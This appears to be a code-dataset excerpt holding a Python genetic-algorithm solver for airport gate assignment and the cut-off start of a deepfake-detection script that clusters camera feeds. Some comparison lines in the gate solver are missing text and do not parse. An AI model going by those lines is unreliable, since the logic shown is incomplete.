kk>=0])\n\t\t\tdistribution_match=get_distribution_match(Alignmenttable,self.choosedpucks,self.Gates)\n\t\t\tused_gates=len(set(distribution_match[:,-1]))-1\n\t\t\tif align_len>maxalign:\n\t\t\t\tmaxalign=align_len\n\t\t\t\tmax_distribution_match=np.copy(distribution_match)\n\t\t\t\tmax_used_gates=used_gates\n\t\t\t\tmax_Alignmenttable=np.copy(Alignmenttable)\n\t\t\t\tcounter=0\n\t\t\telse:\n\t\t\t\tcounter+=1\n\t\t\tprint('align_len',align_len)\n\t\t\tprint('used_gates',used_gates)\n\t\t#print(max_Alignmenttable)\n\t\tprint('maxalign',maxalign)\n\t\tprint('max_used_gates',max_used_gates)\n\t\tsaveresult(max_distribution_match)\n\t\tgate_shiyonglv(max_Alignmenttable,self.choosedtimetable,self.Gates)\n\t\tWa,Na=getNWdistribution(max_Alignmenttable,self.Gates)\n\t\tprint('Wide_plane and Narrow_plane tistribution num ',Wa,Na)\n\n\nclass evolution:\n\t\"\"\"\n\tthis is the main part of genetic alogrithm, there's three method to generate original gene group, first method is generate_original_group(),this is a random method\n\tsecond is use greedy_object.distribute_mostpucks(True), this is the solution of problem 1\n\tthird one is use greedy_object.Roulette_gambling(self.pucks,self.gates,self.Indexs,self.timetable) this is more suitable for generate original gene group\n\tbefore every iteration, a deal_conflict() should be called to deal with confilct. 
but after deal_conflict(), there are some -1\n\tso before select/exchange/variation a step to remove -1 is needed\n\t\"\"\"\n\tdef __init__(self,index,pucks,gates,tickets,timetable,problemnum):\n\t\tself.group_num=200\n\t\tself.old_group_num=self.group_num\n\t\tself.tag=False\n\t\tself.Indexs=index\n\t\tself.pucks=pucks\n\t\tself.gates=gates\n\t\tself.tickets=tickets\n\t\tself.timetable=timetable\n\t\tself.problem=problemnum\n\t\tself.greedy_object=greedy_select(self.pucks,self.gates,self.timetable,self.Indexs)\n\t\t'''\n\t\tif you want to random generate orginal gene group, use generate_original_group(self.Indexs,self.group_num)\n\t\tif you want to generate orginal gene group with greedy selection or Roulette_gambling use generate_group_greedy(self.group_num)\n\t\t'''\n\t\t#self.group=self.generate_original_group(self.Indexs,self.group_num)\n\t\tself.group=self.generate_group_greedy(self.group_num)\n\t\tif self.problem==2:\n\t\t\tself.gate_weight=8\n\t\t\tself.time_weight=2\n\t\t\tself.gate_num_weight=1\n\t\tif self.problem==3:\n\t\t\tself.gate_weight=0.1\n\t\t\tself.time_weight=10\n\t\t\tself.gate_num_weight=1\n\t\tself.remain_best_num=4\n\t\tself.newgene_num=2*self.group_num//50\n\t\tself.exchange_gene_num=2\n\t\tself.gene_length=self.pucks.shape[0]\n\t\tself.iteration_step=0\n\t\tself.counter=0\n\t\tself.match_flight()\n\t\tself.get_group_score()\n\t\tself.rank_group()\n\t\tself.best_so_far=np.copy(self.group[:self.remain_best_num])\n\t\tself.best_so_far_score=np.copy(self.group_score[:self.remain_best_num])\n\t\t#print(self.Indexs)\n\n\tdef generate_group_greedy(self,num):\n\t\tgroup=[]\n\t\tfor ii in range(num):\n\t\t\tgene=self.greedy_object.Roulette_gambling(self.pucks,self.gates,self.Indexs,self.timetable)\n\t\t\t#gene=self.greedy_object.distribute_mostpucks(True)\n\t\t\tgroup.append(gene)\n\t\tgroup=np.array(group,dtype=int)\n\t\treturn group\n\n\n\tdef generate_original_group(self,index,num):\n\t\toriginal_group=[]\n\t\tdate_num=np.arange(0,index.shape[1],1).astype(int)\n\t\tfor ii in range(num):\n\t\t\toriginal_gene=np.zeros(shape=(index.shape[0]),dtype=int)\n\t\t\tfor jj in range(index.shape[0]):\n\t\t\t\tgate_set=date_num[index[jj]]\n\t\t\t\ta=np.random.randint(low=0,high=len(gate_set),size=1)\n\t\t\t\toriginal_gene[jj]=gate_set[a]\n\t\t\toriginal_group.append(original_gene)\n\t\toriginal_group=np.array(original_group,dtype=int)\n\t\treturn original_group\n\n\n\tdef match_flight(self):\n\t\tticketssize=self.tickets.shape[0]\n\t\tpucksize=self.pucks.shape[0]\n\t\tmatch_table=np.zeros(shape=(ticketssize,3),dtype=int)\n\t\tmatch_table=match_table-1\n\t\tfor ii in range(ticketssize):\n\t\t\tmatch_table[ii,0]=int(self.tickets[ii,1])\n\t\t\tfor jj in range(pucksize):\n\t\t\t\tif self.pucks[jj,1]==self.tickets[ii,3] and self.pucks[jj,3]==self.tickets[ii,2]:\n\t\t\t\t\tmatch_table[ii,1]=jj\n\t\t\t\t\tbreak;\n\t\t\tfor jj in range(pucksize):\n\t\t\t\tif self.pucks[jj,6]==self.tickets[ii,5] and self.pucks[jj,8]==self.tickets[ii,4]:\n\t\t\t\t\tmatch_table[ii,2]=jj\n\t\t\t\t\tbreak;\n\t\tself.match_table=match_table\n\t\t\n\n\tdef deal_conflict(self,gene):\n\t\tpucksize=self.pucks.shape[0]\n\t\tgatesize=self.gates.shape[0]\n\t\tconflict_position=np.zeros(shape=(pucksize),dtype=int)\n\n\t\tgate_set=[[] for i in range(gatesize)]\n\t\tfor ii in range(pucksize):\n\t\t\tif gene[ii]!=-1:\n\t\t\t\tgate_set[int(gene[ii])].append(ii)\n\t\t\telse:\n\t\t\t\tconflict_position[ii]=1\n\t\tfor ii in range(gatesize):\n\t\t\tcontainsize=len(gate_set[ii])\n\t\t\t#print('gate %d'%ii,gate_set[ii])\n\t\t\tif 
containsize>=2:\n\t\t\t\tlastpoint=0\n\t\t\t\tfor jj in range(containsize-1):\n\t\t\t\t\tif self.timetable[gate_set[ii][jj+1],0](self.timetable[self.match_table[ii,1],1]-45):\n\t\t\t\t\t\tself.missedflghtnum=self.missedflghtnum+self.match_table[ii,0]\n\n\t\t\t\t\ttimecost=cost_table[keyi,keyj]*self.match_table[ii,0]\n\t\t\t\t\t#print('#####',keyi,keyj,timecost,self.match_table[ii,0])\n\t\t\t\telse:\n\t\t\t\t\terrortimecost=50*self.match_table[ii,0]\n\t\t\t\ttotalcost=totalcost+timecost+errortimecost\n\t\t\t\ttotal_matched_cost=total_matched_cost+timecost\n\t\tsroce=self.gate_weight*matchsize/gene.shape[0]+self.time_weight*total_matched_cost/(sum(self.match_table[:,0])*30)+self.gate_num_weight*gate_num/self.gates.shape[0]\n\n\t\treturn sroce,totalcost,total_matched_cost\n\n\n\tdef calculate_sroce_problem3(self,gene):\n\t\tmatchsize=len([ii for ii in gene if ii==-1])\n\t\ttotalcost=0\n\t\thangban_time=0\n\t\ttotal_matched_cost=0\n\t\tticketssize=self.tickets.shape[0]\n\t\tcost_table=np.array([[15,20,35,40],[20,15,40,35],[35,40,20,30],[40,45,30,20]]).reshape((4,4)).astype(int)\n\t\tjieyun_table=np.array([[0,1,0,1],[1,0,1,0],[0,1,0,1],[1,2,1,0]]).reshape((4,4)).astype(int)\n\t\twalk_table=np.array([10,15,20,25,20,25,25,0,10,15,20,15,20,20,0,0,10,25,20,25,25,0,0,0,10,15,20,20,0,0,0,0,10,15,15,0,0,0,0,0,10,20,0,0,0,0,0,0,10]).reshape(7,7)\n\t\tself.passengernum=0\n\t\tself.missedflghtnum=0\n\t\tself.huancheng_time=[]\n\t\tself.gerenjingzhangdu=[]\t\t\n\t\tfor ii in range(ticketssize):\n\t\t\tif self.match_table[ii,1]!=-1 and self.match_table[ii,2]!=-1:\n\t\t\t\ttimecost=0\n\t\t\t\terrortimecost=0\n\t\t\t\tif gene[self.match_table[ii,1]]!=-1 and gene[self.match_table[ii,2]]!=-1:\n\t\t\t\t\tif self.pucks[self.match_table[ii,1],4]=='D':\n\t\t\t\t\t\tif self.gates[gene[self.match_table[ii,1]],1]=='T':\n\t\t\t\t\t\t\tkeyi=0\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tkeyi=1\n\t\t\t\t\telse:\n\t\t\t\t\t\tif self.gates[gene[self.match_table[ii,1]],1]=='T':\n\t\t\t\t\t\t\tkeyi=2\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tkeyi=3\n\t\t\t\t\tif self.pucks[self.match_table[ii,2],4]=='D':\n\t\t\t\t\t\tif self.gates[gene[self.match_table[ii,2]],1]=='T':\n\t\t\t\t\t\t\tkeyj=0\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tkeyj=1\n\t\t\t\t\telse:\n\t\t\t\t\t\tif self.gates[gene[self.match_table[ii,2]],1]=='T':\n\t\t\t\t\t\t\tkeyj=2\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tkeyj=3\n\n\t\t\t\t\tif self.gates[gene[self.match_table[ii,1]],1]=='T':\n\t\t\t\t\t\tif self.gates[gene[self.match_table[ii,1]],2]=='North':\n\t\t\t\t\t\t\taerai=0\n\t\t\t\t\t\telif self.gates[gene[self.match_table[ii,1]],2]=='Center':\n\t\t\t\t\t\t\taerai=1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\taerai=2\n\t\t\t\t\telse:\n\t\t\t\t\t\tif self.gates[gene[self.match_table[ii,1]],2]=='North':\n\t\t\t\t\t\t\taerai=3\n\t\t\t\t\t\telif self.gates[gene[self.match_table[ii,1]],2]=='Center':\n\t\t\t\t\t\t\taerai=4\n\t\t\t\t\t\telif self.gates[gene[self.match_table[ii,1]],2]=='South':\n\t\t\t\t\t\t\taerai=5\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\taerai=6\n\t\t\t\t\tif self.gates[gene[self.match_table[ii,2]],1]=='T':\n\t\t\t\t\t\tif self.gates[gene[self.match_table[ii,2]],2]=='North':\n\t\t\t\t\t\t\taeraj=0\n\t\t\t\t\t\telif self.gates[gene[self.match_table[ii,2]],2]=='Center':\n\t\t\t\t\t\t\taeraj=1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\taeraj=2\n\t\t\t\t\telse:\n\t\t\t\t\t\tif self.gates[gene[self.match_table[ii,2]],2]=='North':\n\t\t\t\t\t\t\taeraj=3\n\t\t\t\t\t\telif self.gates[gene[self.match_table[ii,2]],2]=='Center':\n\t\t\t\t\t\t\taeraj=4\n\t\t\t\t\t\telif 
self.gates[gene[self.match_table[ii,2]],2]=='South':\n\t\t\t\t\t\t\taeraj=5\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\taeraj=6\n\n\n\t\t\t\t\tif aeraj>=aerai:\n\t\t\t\t\t\twalk_time=walk_table[aerai,aeraj]\n\t\t\t\t\telse:\n\t\t\t\t\t\twalk_time=walk_table[aeraj,aerai]\n\t\t\t\t\ttimecost=(cost_table[keyi,keyj]+jieyun_table[keyi,keyj]*8+walk_time)*self.match_table[ii,0]\n\n\t\t\t\t\tself.huancheng_time.append([timecost,self.match_table[ii,0]])\n\t\t\t\t\tself.passengernum=self.passengernum+self.match_table[ii,0]\n\t\t\t\t\tif (timecost+self.timetable[self.match_table[ii,0],0])>(self.timetable[self.match_table[ii,1],1]-45):\n\t\t\t\t\t\tself.missedflghtnum=self.missedflghtnum+self.match_table[ii,0]\n\n\t\t\t\t\tdanrenhuangbantime=(self.timetable[self.match_table[ii,1],1]-self.timetable[self.match_table[ii,0],0]-45)*self.match_table[ii,0]\n\t\t\t\t\thangban_time=hangban_time+danrenhuangbantime\n\t\t\t\t\tself.gerenjingzhangdu.append([timecost/danrenhuangbantime,self.match_table[ii,0]])\n\n\t\t\t\telse:\n\t\t\t\t\terrortimecost=100*self.match_table[ii,0]\n\t\t\t\ttotalcost=totalcost+timecost+errortimecost\n\t\t\t\ttotal_matched_cost=total_matched_cost+timecost\n\t\tscore=self.gate_weight*matchsize/gene.shape[0]+self.time_weight*total_matched_cost/hangban_time\n\n\t\treturn score,totalcost,total_matched_cost/hangban_time\n\n\n\n\tdef get_group_score(self):\n\t\tgroup_score=[]\n\t\tgroup_totalcost=[]\n\t\tgroup_total_matched_cost=[]\n\t\tself.group_conflict_position=np.zeros(shape=(self.group_num,self.pucks.shape[0]),dtype=int)\n\t\tfor ii in range(self.group_num):\n\t\t\tgene,conflict_position=np.array(self.deal_conflict(self.group[ii]),dtype=int)\n\t\t\tif self.problem==2:\n\t\t\t\tsroce,totalcost,total_matched_cost=self.calculate_sroce_problem2(gene)\n\t\t\telif self.problem==3:\n\t\t\t\tsroce,totalcost,total_matched_cost=self.calculate_sroce_problem3(gene)\n\t\t\tgroup_score.append(sroce)\n\t\t\tgroup_totalcost.append(totalcost)\n\t\t\tgroup_total_matched_cost.append(total_matched_cost)\n\t\t\tself.group[ii]=gene\n\t\t\tself.group_conflict_position[ii]=conflict_position\n\t\tself.group_score=np.array(group_score)\n\t\tself.group_totalcost=np.array(group_totalcost)\n\t\tself.group_total_matched_cost=np.array(group_total_matched_cost)\n\n\n\t\n\tdef rank_group(self):\n\t\tindex=np.argsort(self.group_score)\n\t\tself.group=self.group[index]\n\t\tself.group_score=self.group_score[index]\n\t\tself.group_totalcost=self.group_totalcost[index]\n\t\tself.group_total_matched_cost=self.group_total_matched_cost[index]\n\t\tself.group_conflict_position=self.group_conflict_position[index]\n\t\t#print('totalcost :5',self.group_totalcost[:5])\n\t\tprint('cost :5',self.group_total_matched_cost[:5])\n\t\t\t\t\t\t\n\tdef exchange_gene(self,selective_gene):\n\t\tnewgene=self.generate_group_greedy(self.newgene_num)\n\t\t#newgene=self.generate_original_group(self.Indexs,self.newgene_num)\n\t\tselective_gene=np.concatenate((selective_gene,newgene),axis=0)\n\t\tnp.random.shuffle(selective_gene)\n\t\tfor ii in range(0,self.group_num-self.remain_best_num,2):\n\t\t\tcross_point=np.random.randint(0,self.gene_length,size=(2*self.exchange_gene_num))\n\t\t\tcross_point=np.sort(cross_point)\n\t\t\tfor jj in range(self.exchange_gene_num):\n\t\t\t\trandom_data=np.random.uniform(low=0,high=1)\n\t\t\t\tif 
random_data<0.8:\n\t\t\t\t\ttemp=np.copy(selective_gene[ii,cross_point[jj*2]:cross_point[jj*2+1]])\n\t\t\t\t\tselective_gene[ii,cross_point[jj*2]:cross_point[jj*2+1]]=selective_gene[ii+1,cross_point[jj*2]:cross_point[jj*2+1]]\t\t\t\n\t\t\t\t\tselective_gene[ii+1,cross_point[jj*2]:cross_point[jj*2+1]]=np.copy(temp)\t\n\n\n\tdef gene_variation(self,selective_gene):\n\t\tindex=np.arange(0,self.gates.shape[0],1).astype(int)\n\t\tfor ii in range(self.group_num-self.remain_best_num):\n\t\t\trandom_data=np.random.uniform(low=0,high=1,size=(self.gene_length))\n\t\t\tfor jj in range(self.gene_length):\n\t\t\t\tif random_data[jj]<0.05:\n\t\t\t\t\tvariationset=index[self.Indexs[jj]]\n\t\t\t\t\tgene_point=np.random.randint(low=0,high=len(variationset))\n\t\t\t\t\tselective_gene[ii,jj]=variationset[gene_point]\n\n\t\n\tdef select_group(self):\n\t\tmixture=np.concatenate((self.group,self.group_score.reshape((-1,1))),axis=1)\n\t\tnp.random.shuffle(mixture)\n\t\tself.group=mixture[:,:self.gene_length]\n\t\tself.group_score=mixture[:,-1].reshape((-1))\n\t\tselected_group=np.zeros(shape=(self.group_num-self.remain_best_num,self.gene_length))\n\t\tselected_group_score=np.zeros(shape=(self.group_num-self.remain_best_num))\n\t\tfor ii in range(self.group_num-self.remain_best_num):\n\t\t\ta=np.random.randint(0,self.group_num)\n\t\t\tb=np.random.randint(0,self.group_num)\n\t\t\tif self.group_score[a]self.threhold:\n\t\t\t\t\tself.tag=True\n\t\t\t\t\tself.threhold=self.threhold*1.5\n\t\t\t\t\tself.group_num=self.group_num-50\n\t\t\t\t\tself.counter=0\n\t\t\t\t\tif self.group_num<50:\n\t\t\t\t\t\tif self.problem==2:\n\t\t\t\t\t\t\tself.calculate_sroce_problem2(self.group[0].astype(int))\n\t\t\t\t\t\tif self.problem==3:\n\t\t\t\t\t\t\tself.calculate_sroce_problem3(self.group[0].astype(int))\n\t\t\t\t\t\tprint('missed flght passenger num: ',self.missedflghtnum)\n\t\t\t\t\t\tprint('total aligned passenger num: ',self.passengernum)\n\t\t\t\t\t\tnum_t=np.zeros(shape=(10),dtype=int)\n\t\t\t\t\t\tfor ii in range(len(self.huancheng_time)):\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=15:\n\t\t\t\t\t\t\t\tnum_t[0]=num_t[0]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=20:\n\t\t\t\t\t\t\t\tnum_t[1]=num_t[1]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=25:\n\t\t\t\t\t\t\t\tnum_t[2]=num_t[2]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=30:\n\t\t\t\t\t\t\t\tnum_t[3]=num_t[3]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=35:\n\t\t\t\t\t\t\t\tnum_t[4]=num_t[4]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=40:\n\t\t\t\t\t\t\t\tnum_t[5]=num_t[5]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=45:\n\t\t\t\t\t\t\t\tnum_t[6]=num_t[6]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=50:\n\t\t\t\t\t\t\t\tnum_t[7]=num_t[7]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=55:\n\t\t\t\t\t\t\t\tnum_t[8]=num_t[8]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=60:\n\t\t\t\t\t\t\t\tnum_t[9]=num_t[9]+self.huancheng_time[ii][1]\n\t\t\t\t\t\tprint('shijian fenbu bi lv: ',num_t/self.passengernum)\n\n\t\t\t\t\t\tif self.problem==3:\n\t\t\t\t\t\t\tbbb=np.zeros(shape=(8))\n\t\t\t\t\t\t\tfor ii in range(len(self.gerenjingzhangdu)):\n\t\t\t\t\t\t\t\tif self.gerenjingzhangdu[ii][0]<=0.01:\n\t\t\t\t\t\t\t\t\tbbb[0]=bbb[0]+self.gerenjingzhangdu[ii][1]\n\t\t\t\t\t\t\t\tif 
self.gerenjingzhangdu[ii][0]<=0.015:\n\t\t\t\t\t\t\t\t\tbbb[1]=bbb[1]+self.gerenjingzhangdu[ii][1]\n\t\t\t\t\t\t\t\tif self.gerenjingzhangdu[ii][0]<=0.02:\n\t\t\t\t\t\t\t\t\tbbb[2]=bbb[2]+self.gerenjingzhangdu[ii][1]\n\t\t\t\t\t\t\t\tif self.gerenjingzhangdu[ii][0]<=0.025:\n\t\t\t\t\t\t\t\t\tbbb[3]=bbb[3]+self.gerenjingzhangdu[ii][1]\n\t\t\t\t\t\t\t\tif self.gerenjingzhangdu[ii][0]<=0.03:\n\t\t\t\t\t\t\t\t\tbbb[4]=bbb[4]+self.gerenjingzhangdu[ii][1]\n\t\t\t\t\t\t\t\tif self.gerenjingzhangdu[ii][0]<=0.035:\n\t\t\t\t\t\t\t\t\tbbb[5]=bbb[5]+self.gerenjingzhangdu[ii][1]\n\t\t\t\t\t\t\t\tif self.gerenjingzhangdu[ii][0]<=0.04:\n\t\t\t\t\t\t\t\t\tbbb[6]=bbb[6]+self.gerenjingzhangdu[ii][1]\n\t\t\t\t\t\t\t\tif self.gerenjingzhangdu[ii][0]>0.045:\n\t\t\t\t\t\t\t\t\tbbb[7]=bbb[7]+self.gerenjingzhangdu[ii][1]\n\t\t\t\t\t\t\tprint('jing zhang du ren shu fen bu:',bbb)\n\n\t\t\t\t\t\treturn self.group[0].astype(int),self.group_total_matched_cost[0]\n\n\tdef get_result(self):\n\t\tAlignmenttable,cost=self.evolution_iteration()\n\t\talignlen=len([kk for kk in Alignmenttable if kk>=0])\n\t\tdistribution_match=get_distribution_match(Alignmenttable,self.pucks,self.gates)\n\t\tused_gates=len(set(distribution_match[:,-1]))-1\n\t\t#print(Alignmenttable)\n\t\tprint('align num',alignlen)\n\t\tprint('used gates num',used_gates)\n\t\tif self.problem==3:\n\t\t\tprint('zong ti jingzhang du: ',cost)\n\t\telif self.problem==2:\n\t\t\tprint('liucheng time cost: ',cost)\n\t\tsaveresult(distribution_match)\n\t\tgate_shiyonglv(Alignmenttable,self.timetable,self.gates)\n\t\tWa,Na=getNWdistribution(Alignmenttable,self.gates)\n\t\tprint('Wide_plane and Narrow_plane tistribution num ',Wa,Na)\n\n\n#tongji feiji shi jian fen bu\ndef distribution(timetable):\n\tstarttime=np.min(timetable)\n\tendtime=np.max(timetable)\n\tprint('##################',starttime,endtime)\n\tsize=(endtime-starttime)//5\n\tstatistic_time=np.zeros(shape=(size),dtype=int)\n\tfor ii in range(size):\n\t\tnum=0\n\t\tfor jj in range(timetable.shape[0]):\n\t\t\tif timetable[jj][0]<=starttime+ii*5+2.5 and timetable[jj][1]>=starttime+ii*5+2.5:\n\t\t\t\tnum+=1\n\t\tstatistic_time[ii]=num\n\tstatistic_time=statistic_time.reshape(-1,1)\n\tnp.savetxt('save_tempresult/statistic_time.txt',statistic_time,fmt='%d')\n\ndef get_distribution_match(alignmenttable,pucks,gates):\n\tpuck=[]\n\tgate=[]\n\tfor ii in range(alignmenttable.shape[0]):\n\t\tif alignmenttable[ii]!=-1:\n\t\t\tpuck.append(pucks[ii][0])\n\t\t\tgate.append(gates[alignmenttable[ii],0])\n\t\telse:\n\t\t\tpuck.append(pucks[ii][0])\n\t\t\tgate.append('lawn')\n\tpuck=np.array(puck).reshape(-1,1)\n\tgate=np.array(gate).reshape(-1,1)\n\tdistribution_match=np.concatenate((puck,gate),axis=1)\n\treturn distribution_match\n\ndef saveresult(max_distribution_match):\n\tpuckindex=np.argsort(max_distribution_match,axis=0)\n\tmax_distribution_match=max_distribution_match[puckindex[:,0]]\n\t#print(max_distribution_match)\n\tnp.savetxt('save_tempresult/distribution_orderby_selectpuckID.txt',max_distribution_match[:,1],fmt='%s')\n\ndef getNWdistribution(alignment,gates):\n\tWalignednum=0\n\tNalignednum=0\n\tfor ii in range(alignment.shape[0]):\n\t\tif alignment[ii]!=-1:\n\t\t\tif gates[alignment[ii],5]=='W':\n\t\t\t\tWalignednum=Walignednum+1\n\t\t\telif gates[alignment[ii],5]=='N':\n\t\t\t\tNalignednum=Nalignednum+1\n\treturn Walignednum,Nalignednum\n\ndef gate_shiyonglv(alignmenttable,timetable,gates):\n\tTset=[]\n\tSset=[]\n\tgate_time=np.zeros(shape=(gates.shape[0]))\n\tfor ii in alignmenttable:\n\t\tif ii!=-1:\n\t\t\tif 
gates[ii,1]==('T'):\n\t\t\t\tTset.append(ii)\n\t\t\telif gates[ii,1]==('S'):\n\t\t\t\tSset.append(ii)\n\n\tgate_set=[[] for i in range(gates.shape[0])]\n\tfor ii in range(alignmenttable.shape[0]):\n\t\tif alignmenttable[ii]!=-1:\n\t\t\tgate_set[alignmenttable[ii]].append(ii)\n\t\n\tfor ii in range(gates.shape[0]):\n\t\ttimesum=0\n\t\tfor kk in gate_set[ii]:\n\t\t\tendtime=timetable[kk,1]-45\n\t\t\tstarttime=timetable[kk,0]\n\t\t\tif endtime>2880:\n\t\t\t\tendtime=2880\n\t\t\tif starttime<1440:\n\t\t\t\tstarttime=1440\n\t\t\ttimesum=timesum+(endtime-starttime)\n\t\tgate_time[ii]=timesum\n\tgate_time=gate_time/1440\n\tresult=[]\n\tfor ii in range(gates.shape[0]):\n\t\tresult.append([gates[ii,0],gate_time[ii]])\n\tprint('T Gate use ',len(set(Tset)))\n\tprint('S Gate use ',len(set(Sset)))\n\tnp.savetxt('save_tempresult/gate_shiyonglv.txt',result,fmt='%s')\n\n\nif __name__=='__main__':\n\tbathpath=sys.path[0]\n\tproblem=args.problem\n\tmethod=args.method\n\n\tprocess_data_object=process_data(bathpath)\n\tselectpucks,Gates,selecttickets,Timetable=process_data_object.get_data()\n\tdistribution(Timetable)\n\n\tif method=='greedy':\n\t\tTimecost_index=process_data_object.get_timecost_index(Timetable)\n\t\tselectpucks=selectpucks[Timecost_index]\n\t\tchoosedpucks=np.copy(selectpucks)\n\t\tTimetable=Timetable[Timecost_index]\n\t\tchoosedtimetable=np.copy(Timetable)\n\t\tIndexs=process_data_object.indexof_pucks_gates(choosedpucks,Gates)\n\t\tgreedy_object=greedy_select(choosedpucks,Gates,choosedtimetable,Indexs)\n\t\tgreedy_object.get_result()\n\n\n\telif method=='genetic':\n\t\tTimetable_index=np.argsort(Timetable[:,1])\n\t\tselectpucks=selectpucks[Timetable_index]\n\t\tchoosedpucks=np.copy(selectpucks)\n\t\tTimetable=Timetable[Timetable_index]\n\t\tchoosedtimetable=np.copy(Timetable)\n\t\tIndexs=process_data_object.indexof_pucks_gates(selectpucks,Gates)\n\t\tgenetic_object=evolution(Indexs,choosedpucks,Gates,selecttickets,choosedtimetable,problem)\t\n\t\tgenetic_object.get_result()\n\n\telse:\n\t\tprint('command args error')\n\n\n\n","repo_name":"DreAymi/shumo_F_ditribution","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":32113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38204454410","text":"#\n# Social Video Verification\n# Harman Suri, Eleanor Tursman\n# Brown University, 2020\n#\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\nimport numpy as np\nfrom scipy.io import loadmat\nfrom sklearn.decomposition import PCA\nfrom sklearn.covariance import MinCovDet\nfrom scipy.cluster.hierarchy import linkage, fcluster\nfrom pywt import wavedec2, dwt_max_level\n\ndef mahalanobis_calculate(data, num_pcs):\n pca = PCA(num_pcs)\n T = pca.fit_transform(data)\n # fit a Minimum Covariance Determinant (MCD) robust estimator to data \n robust_cov = MinCovDet().fit(T)\n # Get the Mahalanobis distance\n m = robust_cov.mahalanobis(T)\n return m\n\n# numFakes will be the number of\n# fakes detected, and c will be a vector of numCams integers, which are \n# partitioned into two sets. 
We assume the larger partition is real.\n\ndef detectFakesTree(link, thresh):\n \n ratio = link[-1][-2] / link[-2][-2]\n if ratio > thresh:\n c = fcluster(link, 2,criterion='maxclust')\n partition1 = len(np.argwhere(c==1))\n partition2 = len(np.argwhere(c==2))\n if (partition1 > partition2):\n numFakes = partition2\n else:\n numFakes = partition1\n else:\n numFakes = 0\n c = 0\n return numFakes, c\n\n\ndef resultsHelper(numFakes, cLst, result):\n if numFakes[0] == 0:\n result[0][0] = 1\n \n if numFakes[1] == 1:\n if (np.all(cLst[0] == np.array([1,1,1,2,1,1])) or np.all(cLst[0] == np.array([2,2,2,1,2,2]))):\n result[0][1] = 1\n \n if numFakes[2] == 2:\n if (np.all(cLst[1] == np.array([1,1,2,2,1,1])) or np.all(cLst[1] == np.array([2,2,1,1,2,2]))):\n result[0][2] = 1\n \n if numFakes[3] == 3:\n if (np.all(cLst[2] == np.array([1,2,2,2,1,1])) or np.all(cLst[2] == np.array([2,1,1,1,2,2]))):\n result[0][3] = 1\n return result\n\n\n\ndef clusterHelper(X0, X1, X2, X3, thresh, result):\n #Test for tracking failures and remove\n badInds = []\n \n for i, row in enumerate(X0.T):\n if np.max(row) >= 10:\n badInds.append(i)\n \n X0 = np.delete(X0, badInds, axis = 1)\n X1 = np.delete(X1, badInds, axis = 1)\n X2 = np.delete(X2, badInds, axis = 1)\n X3 = np.delete(X3, badInds, axis = 1)\n \n #generate the linkage matrices with euclidean metric, we will cluster data ourselves\n link0 = linkage(X0)\n link1 = linkage(X1)\n link2 = linkage(X2)\n link3 = linkage(X3)\n \n numFakes0, _ = detectFakesTree(link0, thresh)\n numFakes1, c1 = detectFakesTree(link1, thresh)\n numFakes2, c2 = detectFakesTree(link2, thresh)\n numFakes3, c3 = detectFakesTree(link3, thresh)\n \n return resultsHelper([numFakes0, numFakes1, numFakes2, numFakes3], [c1,c2,c3], result)\n \n \ndef createDecompVector(coeff):\n output = []\n for i in range(len(coeff)):\n for j in range(len(coeff[i])):\n output.append(coeff[i][j].flatten())\n return np.hstack(output)\n\ndef socialVerificationNoPCA(data2,data3,data4, thresh):\n result = np.zeros((1,4))\n fullLen = min(data2['cam1'].shape[0], data3['cam1'].shape[0], data4['cam1'].shape[0])\n \n level = dwt_max_level(fullLen, 'haar')\n \n cam1_dist = createDecompVector(wavedec2(data2['cam1'][:fullLen,:], level = level, wavelet ='haar'))\n cam2_dist = createDecompVector(wavedec2(data2['cam2'][:fullLen,:], level = level, wavelet ='haar'))\n cam3_dist = createDecompVector(wavedec2(data2['cam3'][:fullLen,:], level = level, wavelet ='haar'))\n cam4_dist = createDecompVector(wavedec2(data2['cam4'][:fullLen,:], level = level, wavelet ='haar'))\n cam5_dist = createDecompVector(wavedec2(data2['cam5'][:fullLen,:], level = level, wavelet ='haar'))\n cam6_dist = createDecompVector(wavedec2(data2['cam6'][:fullLen,:], level = level, wavelet ='haar'))\n fake2_dist = createDecompVector(wavedec2(data2['fake'][:fullLen,:], level = level, wavelet ='haar'))\n fake3_dist = createDecompVector(wavedec2(data3['fake'][:fullLen,:], level = level, wavelet ='haar'))\n fake4_dist = createDecompVector(wavedec2(data4['fake'][:fullLen,:], level = level, wavelet ='haar'))\n \n X0 = np.array([cam1_dist, cam2_dist, cam3_dist, cam4_dist, cam5_dist, cam6_dist])\n X1 = np.array([cam1_dist, cam2_dist, cam3_dist, fake4_dist, cam5_dist, cam6_dist])\n X2 = np.array([cam1_dist, cam2_dist, fake3_dist, fake4_dist, cam5_dist, cam6_dist])\n X3 = np.array([cam1_dist, fake2_dist, fake3_dist, fake4_dist, cam5_dist, cam6_dist])\n \n return clusterHelper(X0, X1, X2, X3, thresh, result)\n \n\n\n\n\ndef socialVerificationOnlyPCA(data2,data3,data4, thresh, 
